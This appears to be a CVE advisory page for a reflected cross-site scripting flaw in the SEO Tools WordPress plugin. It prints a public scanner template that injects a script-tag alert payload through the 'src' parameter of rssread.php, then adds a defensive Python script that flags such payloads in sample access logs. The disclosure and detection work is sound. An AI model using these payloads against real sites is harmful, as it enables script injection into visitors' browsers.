CVE-2024-13853: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: WordPress SEO Tools Plugin | PoC: public

Vulnerability description

The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.

PoC code [public]

id: CVE-2024-13853

info:
  name: WordPress SEO Tools Plugin 4.0.7 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The SEO Tools WordPress plugin through version 4.0.7 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'src' parameter in the rssread.php file before outputting it back in the page, which could allow attackers to execute arbitrary JavaScript code in a victim's browser.
  reference:
    - https://wpscan.com/vulnerability/52991dd9-41f7-4cf8-b8c9-56dd4e62bf0c
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13853
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13853
    cwe-id: CWE-79
    epss-score: 0.00315
    epss-percentile: 0.54078
  metadata:
    max-request: 1
    vendor: WordPress
    product: seo-automatic-seo-tools
    shodan-query: http.html:"seo-automatic-seo-tools"
    fofa-query: body="wp-content/plugins/seo-automatic-seo-tools/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,xss,seo-automatic-seo-tools

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - 'seo-automatic-seo-tools'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"></script><script>alert(document.domain)</script><script>'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100abb72d3845e4655efc2cb2847022266f4641c9c5e1578301de2dd52149bd7e9e02210080dd2cc48ccc1c714f661d071d8b1b8c77711e198b940f75a5f8417d7bc30a0e:922c64590222798bb761d5b6d8e72950
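The template above checks a host by reflecting a known payload through the unescaped 'src' parameter of rssread.php. From the defender's side, the same parameter is the thing to watch in web-server access logs. The following script is an added example (not part of the advisory or the plugin) that parses constructed Combined Log Format lines, URL-decodes the 'src' value on requests to the vulnerable script path, and flags values carrying markup or event-handler syntax that a legitimate feed URL would never contain; the log lines, IPs and the generic marker regex are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format); not real traffic.
# Line 2 carries the exact payload from the advisory's template; line 3 a variant.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=https%3A%2F%2Fexample.com%2Ffeed HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Aug/2025:10:00:02 +0000] "GET /wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1" 200 777 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Aug/2025:10:00:03 +0000] "GET /wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php?src=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1" 200 700 "-" "Mozilla/5.0"
198.51.100.8 - - [01/Aug/2025:10:00:04 +0000] "GET /?s=hello HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Minimal Combined Log Format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Path from the advisory; matched with endswith() so sites installed under a
# sub-directory (e.g. /blog/wp-content/...) are still covered.
VULN_PATH = "/wp-content/plugins/seo-automatic-seo-tools/feedcommander/rssread.php"

# Assumed markers that a genuine feed URL never contains: tag delimiters, a bare
# double quote (breaks out of an attribute), an on*= event handler, or javascript:.
SUSPICIOUS = re.compile(r'[<>"]|\bon\w+\s*=|javascript:', re.IGNORECASE)


def find_xss_attempts(log_text):
    """Return one record per request whose decoded 'src' value looks like an XSS attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        url = urlsplit(m.group("target"))
        if not url.path.endswith(VULN_PATH):
            continue  # only the vulnerable script is of interest here
        # parse_qs percent-decodes the value and turns '+' into a space, so the
        # check runs on what the server actually saw, not on the encoded form.
        for src in parse_qs(url.query, keep_blank_values=True).get("src", []):
            if SUSPICIOUS.search(src):
                hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "status": int(m.group("status")), "src": src})
    return hits


if __name__ == "__main__":
    for hit in find_xss_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} status={hit["status"]} src={hit["src"]!r}')
```

A 200 response with a text/html body on a flagged request (the conditions the template's matchers look for) indicates the payload was reflected rather than rejected.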
